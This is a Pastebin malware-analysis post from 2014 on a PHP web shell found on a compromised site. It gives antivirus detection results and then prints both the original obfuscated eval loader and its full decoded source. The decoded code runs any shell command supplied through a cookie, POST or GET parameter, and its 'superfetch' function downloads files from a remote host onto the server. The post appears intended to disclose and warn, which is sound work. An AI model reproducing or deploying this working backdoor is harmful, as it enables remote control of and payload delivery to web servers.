SHARE
TWEET

Evil SuperFetchExec PHP Script

MalwareMustDie Aug 5th, 2014 1,922 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. // #MalwareMustdie
  2. // It's an "evil" wget and execute in php script for remote execution downloading Evil craps to a compromised server.
  3. // Found in compromised site, by @yinettesys
  4. // Together with WSO and ELF .so injector malware
  5. // decoded by @unixfreaxjp
  6. // Sample: https://www.virustotal.com/en/file/7caf9209d10c138bb8c1b63f4cc004f0d1f838398823907b25685c7b22e62f74/analysis/1407218933/
  7.  
  8. VT:
  9.    SHA256:
  10.    7caf9209d10c138bb8c1b63f4cc004f0d1f838398823907b25685c7b22e62f74
  11.    File name: styles.php
  12.    Detection ratio: 7 / 54
  13.    Analysis date: 2014-08-05 06:08:53 UTC ( 3 minutes ago )
  14.    AVG                  BackDoor.Generic_c.AAEM  20140805
  15.    Ikarus               Trojan.PHP.WebShell      20140805
  16.    Kaspersky            Trojan.PHP.WebShell.l    20140805
  17.    Qihoo-360            Trojan.Generic           20140805
  18.    Sophos               Troj/PHPShel-AS          20140805
  19.    Tencent              Php.Trojan.Webshell.Akou 20140805
  20.    ViRobot              PHP.A.WebShell.12947     20140805
  21.  
  22. //  original codes:
  23. <?php for($o=0,$e='&\'()*+,-.:]^_`{|,,,|-((.(*,|)`)&(_(*,+)`(-(,+_(-(.(:(](^(_(`({)]+`+{+|,&-^-_(^)](](^(_(^(:(`(,-_(.-_(](:(,+_(-+_(--_(`(.(.+`+_(-(:(.(,+_(--^(.-_(:+{(]+{(:(:(^(`(,(,(,(.(:(:(:+{(,(_(:(_+_(-)](](,(:-_(,,&(_,&+_(-(`(:(.(,(.(.+_(-(.+`(,-_(.(`(](.(_-^(,)](:({(,(,(_(](.(](.-^(,(,(`(,(](:(.({(]-^+_(-(^+_(-(^(.(](,+`(`,&(:+{(.-^(_-_(`-_(]-^+_(-+{(:-^+_(--^(,(_(:(](,(_(`)](:,&(.(,+_(-+{+_(-+|(:(^(,(^(.+{+_(-({(,(^(^(,(_+_(-(_)](.(.(.(](,+_(-(,,&(^(`(`(^(]-^(,(.(,(.(:-_+_(-(^(_)](.(.(.(](,+_(-(,,&(:(^(,(^(.+{+_(-({(,(^(^(,(_+_(-(_)](:(^(.-^(,(_(_(](]+|(`(`(.(.+_(--^(,(.(:+{+_(-+`(`+_(-(:(`(:-_(,,&(,-_(.+{(,+_(-(:)](`+_(-(.+{(_+_(-(_+`+_(-)]+_(-(_(,(.(:(`(`)]+_(-,&(:+`+_(--^(.(.(`(_(,-^(:(`(](]+_(-,&+_(-)](^({(:-_+_(--_(:,&(,)](:-^(:-_(,(](.+{+_(-(_(,+`(:(](:(_(:(,(,-_(`+{(]-^(.(`(`-_+_(-(,(,(^(^-^+_(-(`(,+`(:(_(:+|+_(-({(`+{(],&(,(.(,(.(:-_+_(-(^+_(-)](](:(](^(_(:(`)](^-_(_(:(^+`(_+`(`+_(-(](^(_+_(-(^+{(^+{(^(,+_(-(.(:,&(,(:(:(_(](.(_(:(_,&+_(-(_(]-_+_(-)](^,&(,({(:+`(:+|(,)](:({(]+`(.(:(:(,(]+{(:(.(^(:(^(.(,({(:(:(:(`(]+`(:(_+_(-(.(.-_(:(^(_+_(-(.+_(-(^(:+_(-(](,(.(:+|(:+|(](.(`(](,(.(.+{(.(^(:(](:(^(^(`(,+_(-+_(-({(.(_(:+_(-+_(-({(.(_(],&(_(_+_(-(_(,,&(:(,(^({+_(-+_(-+_(--_(:+{(:(_(,(](,+|(,-_(:(.(:-_+_(-({(:+_(-(](^(^+`(]+|(.(.(:({+_(-)](.(,+_(--^(.(.(.(]+_(--^(_(.+_(--_(^+{(^(,(^({(:,&(,-_(:(^(,(:(.(](:(:(](:(_(.(^-^+_(-(:+_(-({(,,&(.+`+_(-(:(.(,+_(--^(.-_(:+{(]+|(_)](`(_+_(-(]+_(--^(:+|(:+`+_(--^(:+`(,(^(.(](,)](,-^(:,&(^-_(,+_(-+_(--_(.+_(-(`+_(-(],&(.(,+_(-(:(:)](.(.(,-^(.({+_(-+_(-(^+{(](.(_)](^(:(,-^(:(_(,+|(.(:(:({(,-^(_,&+_(-+_(-+_(-+`(,+`(.+_(-(,(_+_(-)](:+{(,-_(.(_(:+`(:(](.(,(]-^+_(-(`(,({(`(^(`(^(.+`(:(^+_(--_(.(](:(^+_(--_(.+|(^)]+_(-+|(:(](:(`(.+_(-(,(:(.(,+_(--^(:)](`-^(]+|(:(_(^-^+_(-(`(,(`(:-^(,(_(,-_(.+{(,-_(.)](`+_(-(](.(_+|(,,&(`({(,-_(:(`(:-_(,(:(:,&(,-_(_(.(`+_(-(,(:(.(](](^(.,&+_(-+{(:,&(.)](,-_(:,&(],&(_(_+_(-(_(,,&(:(,(^({+_(-+_(-+_(--_(:+{(:(_(,(](,+|(,-_(:(.(:-_+_(-({(:+_(-(](^(^+`(]+|(.(.(:(_+_(-+`(:(_(,(](_,&(`-_(](.(`-^(:+|+_(-(_(,-^(:(](:(,(,(](:(_(](.(_,&(:-^(,+`(:(_(_)](,(.+_(-)](:,&(:+`(:(^(:+|+_(-+`(.-_(:({(]+|(_)](`(_+_(-(]+_(--^(:+|(:+`+_(--^(:+`(,(^(.(](,)](,-^(:,&(^-_(,+_(-+_(--_(.+_(-(`+_(-(],&(.(:+_(-({(.(^(:(^(:(](.+`(](_+_(-(`(,(^(`(^(`(,(](:(_({(_(,(.-^(:(:(,,&(.+|(^({+_(-(`(](:(`(^(:+_(-(,+{(.(,(:(^(.-_(.-^(,-^(.(_+_(-+_(-(^-^(.+{(:(](.+|(,(](:(,+_(--^(.(:(:)](,(^+_(-+`(^(:(,+`(,(.(.+_(-(.,&+_(-)](`+{(],&(.-_(.-^(,-^(.(_+_(-+_(-(^+{(](.(_)](^(:(,-^(:(_(,+|(.(:(:({(,-^(_,&+_(-+_(-+_(-+_(-(,+`(:+|(,(_(,-_(.+{(,-_(.)](`+_(-(](`(_,&(^-^+_(-(:+_(-({(,,&(.)](,+{(.(,+_(-)](:-^(:-^+_(-)](:(,(]+`(,-^(,(:(:(:(.+`(:(^(.(,+_(-(:(:)](.(.(,-^(.({(]+`(,-^(,(:(:(:(.+`(:(^(.(,(,(.(.-_(:+`(,(`+_(-+`(^(:(,+`(,-^(:+_(-(.(^+_(-(_(:+{(,+{(:)](,)]+_(-+{(.+`(](_+_(-(`(,(^(.-^(.(^(,(.(:(.+_(-)]+_(-(^(.(_+_(-)](.+`(^(^(.,&(,(](.(.(:+|(,(](.-_+_(-(_(.(.(:(`+_(-({+_(-+`(^(:(,+`(,-^(:+_(-(`(,(](:(_({(_(,(.(:(:(,(](:(_(](^(^+_(-(:(,(^(,,&(:+|+_(-(.(:(_(,)](_(:(.,&+_(-(:+_(-+`(^(.+_(-+{(,-^(`+`(`-^(,)](:(.(,(](_+`(:({(,(](:+_(-+_(-(_+_(-(`+_(-(:(:(`(:+`(^(,(`(:(,(](.(^(`(_(,,&(:(,(^({+_(-+_(-+_(--_(:+{(:(_(,(](.(,(]+`(.+{(.(,(,+`(.+|(^+`+_(-(:(,)](:-^(:+|(],&(`+`(^+_(-(:(`(^+|(](](_+`(^(^+_(-+`(,-^(:+_(-(:(.(]+`(:+`(,+|(_+`(.+_(-(,-^(_(^(^(^+_(-(:(,(^(`(.(:+`(,(^(:,&(,+|(.(:(:+_(-(_+_(-(.+_(-(^(:+_(-(](,(.(:+|(:+|(](.(`(](,(.(.+{(.(^(:(](.+|(^({+_(-+{(:(](:(^(:+|+_(--^(`(](](_(,+`(:(,+_(--^(.+{(^(^(,(_(,(.(:,&(:(`(:(^(:(_+_(-(.(.(:(.(^+_(--_(:(_+_(--^(^(^(,(.(:+|(:(,(:(^(:(](,-_(:-^(`+_(-(](.(_+|(,,&(`({(,-_(:(`(:-_(,(:(:,&(,-_(_(.(`+_(-(,(:(.(](](^(.,&(,(.(:+|(:(,(:(^(:(](,-_(:-^(,)](,+`(.)](^+`(^(^(](`+_(-(.(:-_+_(--_(:,&(,)](:-^(:-_(,(](.+{(_)]+_(-(`+_(-(:(:+{(.+`+_(--^(.(,(](.(_,&(:-_(,(^(.+|(_)]+_(-(^(,-^(.(_(,(_(,+{(:-_(,(_(_,&(`-_(](.(`-^(:+|+_(-(_(,-^(:(](:(,(,(](:(_(](.(_,&(:(^(,+`(.+{(_)]+_(-+_(-(,(](:+|(:-_(,(:(:(](],&(_(_(`-^(,(:(.(](](^(.,&(,(.(:+|(:(,(:(^(:(](,-_(:-^(.+`+_(-(`(.,&(^(`(,+_(-(:(](:+{(:(`(,(:(,+|(,,&(.-_(.(.(:(](.(](^+`+_(--^(](.(`+{(_(.(_(,(:+`(,+|(_(.(`(`(,({(.(](^({(.,&(,({(:,&(:(`(,+|(:+`(,,&(_(:(.,&+_(-(:+_(-+`(^(.+_(-+{(,-^(`+`(`-^(,)](:(.(,(](_+`(:({(,(](:+_(-+_(-(_+_(-+_(-(,(](:+|(:-_(,(:(:(](],&(_(:(_,&+_(-(_(]-_+_(-)](^,&(,+|(:(`(.,&(]+`(:(,(,(^(.(](:(,(,(.(.(.+_(-(_(,(](,+`(:-^(.+|(,-_(^)](,+|(:-_(:({(,({(:+_(-(^-_+_(-,&(,(^(`(.(.+_(-(:(^(:+`(,(](.(:(,)](,+|(.(,(](.(^+`(]-_(:+|(`(,+_(-+_(-(:+`(,+|(_(.(:-^(,+`(:(_(_)]+_(-+{(,(^(:+{(,(_(,,&(:(_+_(--^(_(:(.,&+_(-)](.(,(](.(,(`+_(-)](:+|(`+_(-(.+`(:+`(,(](.(:(,)](,+|(.(,(](.(^+`(]-_(:+|(`(,(](:(_({+_(-(`(.-_(:+`+_(-({(.(,(^-_+_(-(](](:(:+`(:({+_(-)](,+|(,(:(.(](:-_(:(](.(.(^(:(,(_(:(](:(:(:(^(,(_(`+`+_(-+_(-(_-^(:-^(^(_(,(^(^-_+_(-+|(,(.(,,&(:-^(,-_(.(`(:(^(.+{(:+`(,(`(_,&+_(--_(])]+_(-)](:(`(.,&+_(--_(.+_(-(,(](_(.(`(.(,(:+_(--^+_(-(.+_(-+|(:(_(,)](`-^(,(_(:+|(,)](.+{(:+`(:(](:(:(^(`+_(--^+_(--^(:(`(`-^(:(`(`+`(^+_(-(:(`(.+{(_+_(-(_+`+_(-)](^(.(,({(:+`(:+|(,)](:({(]+`(:)](:(`(,,&(.(,+_(-(_+_(--_(,(](:(_(:+|(_(,(:+`(,+|(_(.(.-^(:(](.+|(^({+_(-+{(:(](:(^(:+|+_(--^(`+{(],&(:)](:(`(,,&(.(,(_)]+_(--_(,(](:(_(:+|(],&(`+`(](:(:+_(-(.-^(:(](.+_(-(^-_+_(-(`(](:(`(^(:+`(,+{(:,&(]+`(.(](:)]+_(--_(_(^(^(:(,+`(,-^(:+_(-(_(:(]+`(.(,(,+{(.+|(:(:(]+{(.({(^)]+_(-(_(,-^(`(.(:({(,)](.(`(,(:(:+|(:(:(]+|(_+|(,,&(,-_(_+_(-(`,&(`(_+_(-)](:-^(,+{(:({(.(.(]+{(.(,(]-^+_(-(`(,({(`(.(:+_(-(,-_(:-_+_(-+`(.-_(.(]+_(-({(]-_(^(,(,(`(,(^(:+_(-(.,&(,(:(:+|(,(](_+`(.-^(:(](:(^(^(`(,+_(-+_(-({(.(_(:+_(-+_(-({(.(_(](.(_-^(:(^(](.(:-^(`(_(,(.(,+`(.+_(-(.+`+_(--^(:+{+_(-({(:-_(`-^(]-_(.(_+_(--_(])]+_(-(_(^({(:-_+_(--_(:,&(,)](:-^(:-_(,(](.+{+_(-(_(,+`(:(](.+_(-(.(,+_(-)](.(`(,-_(.(`(`-^(]-_(.(_+_(--_(,)](.+{(.+_(-(.(,+_(-)](.(`(,-_(.(`(`-^(]-_(.(_+_(--_(])]+_(-(_(^({(:-_+_(--_(:,&(,)](:-^(:-_(,(](.+{+_(-(_(,+`(:(](.+_(-(:+_(-(,-_(:-_(,(_+_(-(^(:(:+_(-(:(.(,(^(^(^+`(]-_(:+_(-(`(,+_(-+_(-(:(_(,)](.(.(:)](]+{(,(^(](^+_(-+`(,-^(:-^(:(^(:(^(:(_+_(-(.(.-_(:(^(](:(_+_(-(^(^(^+{(^(,(.-_(^(:(,+|(.(_(,(](.)](.(.(,(.(.+`(^({(^(.+_(-(:(,,&(.)](,(^(.(:(,-_(.(](`-^(]-_(.(_+_(--_(,)](]-_(:,&(_(.(,(:(:(^(](.(_(.(`(.(,,&(`({(`(_(,(.(,(](.(.(:+|(,(](`+{(]-^(.)](`+`(]+|(:(`+_(-+_(-(^+{(](.(`+{(.(.+_(-,&(:+{(,(:(.(_(:(:(](:(_(](`(_+_(-(](,-^(:,&(:-_(](.(`(`(,+|(_(:(`-_+_(-(,(_+_(-(^)](^+|(^(_+_(-(.(:-_(,,&(:(_+_(--^(:)](`-^(]-_(.(:+_(--_(])]+_(-(_+_(-(.(.)](,)](:-_(,(^(:)](:(:(](:(_+_(-(^(,(^+{(^(,(.-_(:+|(,)](:+{(,(^(_+`(`(.(,(](`-^(]+{(`({(,,&(.(`(:(`(,)](.(`(,(:(.(^(:({(]+{(:,&(_)](,(.+_(-)](:,&(:+`(:(^(:+|+_(-+`(.-_(:({(](:(_+_(-(^(^(^+{+_(-(,(`(_(:(_(^+_(-(:+`(,+|(_(.+_(-(_(,(.(:(_(_)](,(,(,-^(.+_(-(:(_+_(--_(.+_(-(,)](.-_(`-^(]-_(:(^(,+{(:(.+_(-+{(.(,(:(_(,)](,+|(,(^(:+`(:(:(,(^(_,&+_(-(.+_(-+_(-(](`(:(:(.+{+_(-({(:(.+_(-(:(_(.(_(_(^(_(`+{(^(`(,(,+_(-)](:(:(.(,(](.(`(]+_(-+`(.(:(.(_(,-^(_(.+_(-+`(^(^+_(-)](`(^(`(,(](_(_(.(^(`(`(](:(`+_(-)](:(`(^(`(,+{(](:(`(^(.)](,(:(.(:(,-_(_,&(`+`(]+|(:(.+_(-+_(-(^+{(](`(_(,(_(](^(](:(.+_(-({(:({(:(`+_(-(.(_,&+_(-+_(-(,(.(,(.(.(.(:+|(],&(`-_(],&(:,&(`+_(-(](.(_+|+_(-+`(^(_(,,&(`+{(`(,(](:(.({(.+`(.+|(:(^(,(`(.+`(](^+_(-(`(](:(`(_(:-_(:+_(-(_(:(:(`(_(:(_,&+_(-+|(.,&(^-_+_(--^(,-^(`+`(`({(.+`(:(^(,-_(.(^(:(,(](:(_+_(-(^(,(.)](^+`(,-_(`(,(](:(.({(]-^(.(^(`({(^(_(,(^(^(,+_(-(^(,-^(.(_(.+`(](.(`(`(,+|+_(-+_(-(_(`(:(_(_+|(,,&(,-_(.+{(:(](:+`(,(_(:+|+_(-)](.-_(`-^(]-_(.(:(_,&(](:(:(_(`+{(_(.(.+`(.(:+_(-({(.(^(:(^(:(](.(_(^+`+_(-,&+_(-({(:(`(`+_(-(]-^(.(:(](:(`+_(-(.+{(,-^(.(_(^-^+_(-,&(]+{(`(_(:(_(^+_(-(.-^(_(,(.+|(.(:(,(^(.(_(](.+_(-+{(,(](:+|(`)]+_(-(.(,+|(,-_(:(.(:(:(,({(_,&+_(-(.+_(-+_(-(](.(.)](`,&(,(^(_({(.+`(.-_(.-^(,-^(.(_+_(--^(^(_(,({(`-^(`,&(,(^(`+`(^+_(-(.-_(:(^(,(:(.+`+_(-(_(:(.(,(.(:-_(.)](,(_(:+|(,-^(.-_(`-^(])]+_(-)](^({(^(,(](`(`(_(:(_(](:(_({+_(-(`(](,(`)](](](.+_(-(^)](^(.+_(-({(:-_(:({+_(-({(.(`(]+`(.+|(:(:+_(--_(.(_(^-^(`({(,,&(.(`(:(`(,)](.(`(,(:(.(^(:({(]+{(:,&(_)](,+_(-+_(--^(.(.(:+|+_(-({(:(^(,-_(:-^(:(^(,(:(_,&+_(-(.+_(-(:(](`(`(_(.)](](_(`(`+_(-({(_(_(`(.(,(`(_+|(:+|(,)](_+_(-(^+{(:(,(,+|(`+{(]-^(:)](_+{(.+{(.(:(](^+_(-,&(,({(:)](:(_+_(-+`(:(_(,(](_(.(`(.(,+`(_)]+_(-(.(,(.(](.(`+{(^(:(_(:(.({(_(,(](:(^-_(,(.(.(:+_(--^(^(_(,,&(_-_+_(-)](,+|(:+|+_(-+`(.-_(:({(](:(_+_(-(^+`(^-^(])](.(^(:+{(]({(`+`(](:(](,(^-_(_(.(:-^(:+|(`+{(_(.(^+{+_(-)](,+|(.(]+_(-({(.(:(.(.(,-^(_,&+_(-(.(,+_(-(](`(`(,+_(--^(.-_(,(`(]+`(_({(`({(]-_(:(`+_(-({(^(,(]+{+_(-+`(,,&(:-^(,(:(](^(`+{(`({(^+{+_(-)](](](.-^(,(^(,-^(.+{(:(_(:,&(]({(_(:(_,&(_+_(-(]+|(:-_(`+{+_(-+|(:+`(:(,(,(_(:(_(](.(_+{+_(-(_(,,&(.(,(^)]+_(-(](](:(`(_(.+`(](:(`+`(_(,(](:(^-_(_(.(:-^(:+|(`+{(_(.(^+{(^(,(]-^(:+_(-(^(`(,+`(:(,+_(-)](.(,(^(`+_(-(_(](:(`(_(.+`(](_(_+{(^+{(`(:(_(](](.(`-^(:+|(`+{(_(.(^+{(^(,(.+`(:(^+_(-,&(:({(:-_+_(--_(.(,+_(--^(^(_(,,&(`-^(`,&(,({(`+`(^+_(-(](,(^-_(_(.(]+|(]+{(`({(_(.(^+{(^(,(.+`(:(^(,)](.(_(:)]+_(-({(.(,+_(--^(^(_(,,&(`+{(_(.(_(,(^+`(_(:(](:(:(:(,({(.,&(^)](^(.(])]+_(-,&+_(-(.(:(_(:,&(]({(`+_(-(^+|(_(.(]+|(]+{(`({(_(.(^+{+_(-)](,+|(:(,(,(_(.(^(.(^(,-^(_,&+_(-(.(,+_(-(](.(_)](^(:(_(:(.-^(_(,(:(`(^+|(](](_+`(^(.+_(-,&(]+{(.+_(-(:(](,+{(.+_(-+_(--^(_+`(:(:+_(-(:(.(,(^(^(`({(,,&(.(`(:(`(,)](.(`(,(:(.(^(:({(]+{(:,&(_)](,+_(-(,(_(:(:(.+{+_(--^(,+|(,-_(:(.(:(:(,({(_,&+_(-(.+_(-+_(-(](.(^({(.(.(_(,(^+`(,(:(.+|(`-^(]-_(.(_(,+{(]-_(^(_(`(,(.-^(,(.(:+`(,)](.(.(`(_+_(-({(:(,(](_+_(-(`+_(-)](:(](:+|+_(--^(:(,(,(.(_+`(_(`(^(^(_(^+_(-)]+_(-(_(,-^(.(](`(_(,(](.(_(,(_(.(_(`(_(^)](`+{+_(-(_(^,&(,-_(:(`(.-_(](^(:,&+_(--_(.(_(:+`(]+{(_(:+_(-(,(^(.(,-^(:+_(-(:+_(-(,(^(`(:(.(^(,+_(-(`(](](.(]-_(:-_(,)](_+_(-(^+{(^(,(,-_(:(,(,(.(.(^(`(_(])](,+`(`,&(.-^(,(^(`(,(_(.(_(,(^+`+_(-(`(](,(^-_(,-^(.)](](^+_(-(`(,(.(:(](`+_(-(.+`(.(,+_(--^(:({(.(^+_(--_(:(`+_(--^(^(_(,({(`-^(`+{+_(-)](.(_+_(-+`(.-_(.(](,,&(.(,(](.+_(-+_(-(,(:(`(,(`(,(](:(^)](_(:(:+_(-(^+|(_(.(]+|+_(-(.+_(-(:(^(_+_(-(.(:+|+_(-(.(.(:(,(_(.(^(:(.(,-^(_,&+_(-+_(-(^(.(]+|(`-^(`,&(,)](`+`(^+_(-(](,(^-_(_(.(:,&(_)](,+_(-+_(--^(.(.(:+|+_(-({(:(^(,-_(:-^(:(^(,(:(_,&+_(-(.+_(-(:(:(,(_(:(,(](](_(`(`(,+{+_(-+_(-(_(](:(_(_)]+_(-(.+_(-(:(:(,(_+_(-(,(](](_(`(`(,+{+_(-+_(-(_(.(:(_(_+|(,,&(`({(_(.(.-_(^(:(_(:(:(_(,(_(:)](:(:(,(.(.(:+_(--^+_(-+`(,+`(.+_(-(,(_+_(-+`(:(.+_(-)](:)](.(.(,(:(:(`(](:(^+{+_(-(,(.+`(,(_+_(-+`(:(.+_(-)](:)](.(.(,(:(:(`(](:(^+`(]-_(:+_(-(`(,(^+_(-(.-^(_(,(](:(:(:(,(`(:(_(^(:+_(-+{(,,&(`+`(:+_(-(,+{(.(,(:(^(:)](.-_+_(-({(:+_(-(^(:+_(--_(](.(.)](.+_(-(:(^(.(,+_(-(:(:)](.(.(,-^(.({+_(--^(^(_(,({(`+{(_(.+_(-(`(^)](_(:(.-_(:+`+_(-({(.(,(^-_+_(-(](](:(:+`(:({+_(-)](,+|+_(-)](.(.(:(:(,(`(.)](_)]+_(-(`+_(-(:(:(`(:+`(](:(.({+_(-(.+_(-(^(.(^(,(:(.(,(^+`+_(--^(:(](:(`(.+_(-(,-_(:(,(](.(_-^(:(^(](.(`-^(]+{(`({(_(.(:(`(:(^+_(-)](:(_(,(:(.+|(`-^(,(:(.(](](^(.,&+_(-+{(:,&(.)](,-_(:,&(](:(:+_(-(.-^(:(](:(^(^)](,(.(,-^(:+|(`+_(-(]-^(:(,(](:(`+_(-(.+{(_+_(-(]+|(^(:+_(--^+_(-({(:(`(:(,(,+|(`+{(,(.(.+{(.(^(:(](:(^(](]+_(-,&(,({(,,&(:(_+_(-+`(:(_(,(](_(:(.,&+_(-(:+_(-+`(](_(,(,(,(](:+_(-(,(_(,(^(.(:(,-_(.(](`-^(]-_(.(_+_(--_(])]+_(-(_(^({(^(,(,-_(:-_+_(-)](.-_(:-_(,,&(_,&(^-^+_(-(:+_(-({(,,&(:+|+_(-(.(:(_(,)](_(:(.,&+_(-(:+_(-+`(^(:(,+`(,-^(:+_(-(`+_(-(]-^(:(,(](:(`+_(-(.+{(_+_(-(:({(:+|(^,&(](](:(^(:(_(_(,(`(`(,(](`(`(`+_(-(:({(.-_(`+|(.(](,(,+_(-(`(_-_+_(-({(:({(:({+_(-(:(:+|(]+|(`-^(:+|(^(_(,({(_-_(`,&(:(^+_(-(,(.(^(,(^+_(-,&(.(.(,(,(_,&(^(_(,(^(,-_(_(.(_(,(:+`(,+|(_(.+_(-(_(,-^(.({(](_(,(_+_(-(.(`+`(`,&(,)](`+`(](:(:+_(-(`(.(,({(`({+_(-(.(.,&(:+{+_(-,&(,+`(:-^(,({(]-^(.(](,+{(^(,(:({(:+|+_(-+{(,,&(`+`+_(-)](,-_(:-^+_(-+`(:-^(.-_(](:(_+_(-(^(^(^+{(](.(.)](`,&(,)](_-^(]-^+_(-(^+_(-+_(-(.-^+_(-+_(-(_,&(^(_(,(^(,-_(_(.+_(-(`(^)](,(:(.+|(`-^(.+{(.(.(^(:(,(_(:(](:-_(:({(,,&(:+`(,)]+_(-(^(.(`+_(--^(.+`(](.+_(-(`+_(-({(,,&(:-^+_(-+`(:(,(](.(_(:(`-_+_(-(,(_+_(-(^(^(]-_+_(-({(.(_(.+{(,(:(.(:+_(-)](.(_(:(`+_(-({(.,&(^(:(,+_(-(](:(`(_(:+`(](:(_({+_(-(`(](,(.-^(:(](:(_(^+{+_(-(:+_(-)](.(_(,(_(,-_(.+{(,-_(.)](`-^(]-_(.(_+_(--_(])](_+_(-(-(_(*,*)`(-(-)^*&,|-(,*(.(*,++^(*,|+`(:)^(*,|(^(^(:-^,:,,(.(*,|)_)\'),(:-^(*,.+^(*,++^(*,|+`+`)`(*,|)^-`,+,_-),+-^(*,*({)`*&,),.-((.(.(*,.+^(*,++^(*,|+`+`)_)_)*(:(^(.(*,.+^(*,++^(^(^(*,|+`+`(:(:)^-`-`,:,,(.(\'*&,:-)-),+-*(.(*+|+)*++(+,*++((:(:-^(*+|*)*|*|*^*:*+)`(,(**.+*+*+&+|*)*|*|*^*:*++|+,*\'+(+))^(*+|+&*|+)+*)`(,(**.+*+*+&+|+&*|+)+*+|+,*\'+(+))^(*+|*-*++*)`(,(**.+*+*+&+|*-*++*+|+,*\'+(+))^-`(*,^)`(*+|*)*|*|*^*:*++^(-,^,+-:(-+`)^,:,,(.,+,`-&-*-:(.(*,^(:(:-^(*,^)`(*+|+&*|+)+*+^(-,^,+-:(-+`)^-`,:,,(.,+,`-&-*-:(.(*,^(:(:-^(*,^)`(*+|*-*++*+^(-,^,+-:(-+`)^-`,:,,(.(\'*&,,-+,{,)-*,:,|,{+|,+-.,:-)-*-)(.(-,*,+,)-(-:-&-*(-(:(:-^,+-,,\',_(.(-,,-+,{,)-*,:,|,{(&,*,+,)-(-:-&-*(.(*,+(_(*,^(:-^,:,,(.(\'(*,^(:-^-(,+-*-+-(,{)^-`(*,+,_)`*&-)-*-(,_,+,{(.(*,+(:)^(*,^,_)`*&-)-*-(,_,+,{(.(*,^(:)^(*-(,_)`(*,+,_(+(*,^,_)^(*,,,_)`(*,+,_(`(*-(,_)^,,,|-((.(*,|)`)&)^(*,|)_(*,,,_)^(*,|(^)`(*,^,_(:-^(*-&)`*&-)-+,(-)-*-((.(*,+(_(*,|(_(*,^,_(:)^(*,*({)`(((*,^((+{(((*-&(()^-`,:,,(.(*-(,_(:-^(*-&)`*&-)-+,(-)-*-((.(*,+(_(*,,,_(_(*-(,_(:)^(*,^)`*&-)-+,(-)-*-((.(*,^(_)&(_(*-(,_(:)^(*,*({)`(((*,^((+{(((*-&(()^-`-(,+-*-+-(,{(.(*,*(:)^-`(-(:)^-`(*,*)`*&,*,+,)-(-:-&-*(.(*,*(_(*,^(:)^,+-,,\',_(.(*,*(:)^',$d='';@ord($e[$o]);$o++){if($o<16){$h[$e[$o]]=$o;}else{$d.=@chr(($h[$e[$o]]<<4)+($h[$e[++$o]]));}}eval($d); ?>
  24.  
  25. // Decoded:
  26.  
  27. <?php
  28.  
  29. //Start setting the system variables
  30.  
  31. if(!@isset($_SERVER)){$_COOKIE=&$HTTP_COOKIE_VARS;$_POST=&$HTTP_POST_VARS;$_GET=&$HTTP_GET_VARS;}
  32.  
  33. //"To DIE" error (trapping..)
  34. function x_die($m){@header('HTTP/1.1 500 '.$m);@die();}
  35.  
  36. //Is it executables_?
  37.  
  38. define('has_passthru',@function_exists('passthru'));
  39. define('has_system',@function_exists('system'));
  40. define('has_shell_exec',@function_exists('shell_exec'));
  41. define('has_popen',@function_exists('popen'));
  42. define('has_proc_open',@function_exists('proc_open'));
  43. define('has_exec',@function_exists('exec'));
  44. define('can_exec',(has_passthru||has_system||has_shell_exec||has_popen||has_proc_open||has_exec));
  45. if(!can_exec){x_die('can not exec: no functions available');}
  46.  
  47. //They check if they can config..this is BAD...
  48.  
  49. define('has_ini_get',@function_exists('ini_get'));
  50. define('has_ini_get_all',@function_exists('ini_get_all'));
  51. define('can_config',(has_ini_get||has_ini_get_all));
  52. if(!can_config){x_die('can not config');}
  53.  
  54. //If  they "can"...get config value
  55. function x_ini_get($n){if(has_ini_get){return(@ini_get($n));}elseif(has_ini_get_all){$h=@ini_get_all();return($h[$n]['local_value']);}}
  56.  
  57. // Checking the safe mode
  58. if(x_ini_get('safe_mode')){x_die('can not exec: safe mode active');}
  59.  
  60. //Evil execution, via shell_exec
  61. function x_passthru($c){@passthru($c);}
  62. function x_system($c){@system($c);}
  63. function x_shell_exec($c){echo @shell_exec($c);}
  64. function x_popen($c){$o;if(($f=@popen($c,'r'))){while(!@feof($f)){$o.=@fgets($f);}@pclose($f);}echo $o;}
  65. function x_proc_open($c){$o;if(@is_resource($p=@proc_open($c,array(0=>array('pipe','r'),1=>array('pipe','w'),2=>array('pipe','w')),$f))){@fclose($f[0]);while(!@feof($f[1])){$o.=@fgets($f[1]);}@fclose($f[1]);@proc_close($p);}echo $o;}
  66. function x_exec($c){$o;@exec($c,$o);echo @implode("\n",$o);}
  67.  
  68. //Wget goes here...
  69. function x_superfetch($a,$p,$r,$l)
  70. {
  71. if($s=@fsockopen($a,$p))
  72. {
  73. if($f=@fopen($l,"wb"))
  74. {
  75. @fwrite($s,"GET ".$r." HTTP/1.0\r\n\r\n");
  76. while(!@feof($s))
  77. {
  78. $b=@fread($s,8192);
  79. @fwrite($f,$b);
  80. }
  81. @fclose($f);
  82. echo "OK\n";
  83. }
  84. @fclose($s);
  85. }
  86. }
  87. //The moronz execution in here...
  88. function x_smart_exec($c)
  89. {
  90. if($c==="which superfetch 1> /dev/null 2> /dev/null && echo OK")
  91. {
  92. echo "OK\n";
  93. }
  94. elseif(@strstr($c,"superfetch"))
  95. {
  96. $a=@explode(' ',$c);
  97. x_superfetch($a[1],$a[2],$a[3],$a[4]);
  98. }
  99. elseif(has_passthru){x_passthru($c);}
  100. elseif(has_system){x_system($c);}
  101. elseif(has_shell_exec){x_shell_exec($c);}
  102. elseif(has_popen){x_popen($c);}
  103. elseif(has_proc_open){x_proc_open($c);}
  104. elseif(has_exec){x_exec($c);}
  105. }
  106. //EXEDCUTEZ!!!
  107. $n='SjJVkE6rkRYj';
  108. $c=$_COOKIE[$n];
  109. if(@empty($c)){$c=$_POST[$n];}
  110. if(@empty($c)){$c=$_GET[$n];}
  111. if(@get_magic_quotes_gpc()){$c=stripslashes($c);}
  112. x_smart_exec($c);
  113. ?>
  114.  
  115. ---
  116. #MalwareMustDie
  117. /* Thou shalt no hack */
RAW Paste Data
Pastebin PRO Summer Special!
Get 60% OFF on Pastebin PRO accounts!
Top